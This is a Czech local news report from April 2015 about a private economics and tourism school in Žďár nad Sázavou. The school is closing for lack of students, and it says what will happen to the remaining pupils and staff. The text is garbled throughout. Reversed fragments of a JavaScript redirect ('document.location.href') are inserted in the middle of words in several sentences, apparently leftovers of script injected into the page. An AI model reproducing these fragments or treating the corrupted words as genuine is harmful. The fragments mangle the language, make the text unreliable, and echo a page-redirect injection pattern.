Rainbow page separator

ŠECR ve Žďáře končí, nemá studenty

Pondělí, 20. dubna 2015

ŠECR Žďár nad Sázavou

Žďár nad Sázavou / Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní maturita osmnácti studentů čtvrtého ročníku Školy ekonomiky a ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovního ruchu ve Žďáře nad Sázavou bude zároveň i tečkou za existencí soukromé školy, která ve městě fungovala od roku 1992. Chybí jí studenti.
Ve třetím a v prvním ročníku aktuálně nejsou žádní a le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos se ke studiu hlásili jenom čtyři žáci. Dvanáct současných druháků bude muset středoškolské studium dokončit jinde, například v jihlavské pobočce školy, která bude fungovat dál. „Rozhodli jsme se, že školu ve Žďáře sloučíme s jihlavskou, a studentům druhého ročníku jsme nabídli přestup do Jihlavy,“ informoval ředitel Školy ekonomiky a ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovního ruchu v Jihlavě Ladislav Vítek. Dostudovat však studenti mohou i jinde, žďárská ŠECR o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom jedná se školami v okolí s podobným zaměřením.
Problémy s ubývajícím počtem studentů ve žďárské škole trvaly několik let, loni se vzdělávací zařízení pokusilo přitáhnout zájem veřejnosti zrušením přijímacích zkoušek, ale ani [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nepomohlo. S koncem školy přijde o práci i šestnáct učitelů.
Kromě školní výuky vzdělávací zařízení, které zřizuje International Education Center, organizuje také jazykové kurzy. Ty budou pokračovat i nadále.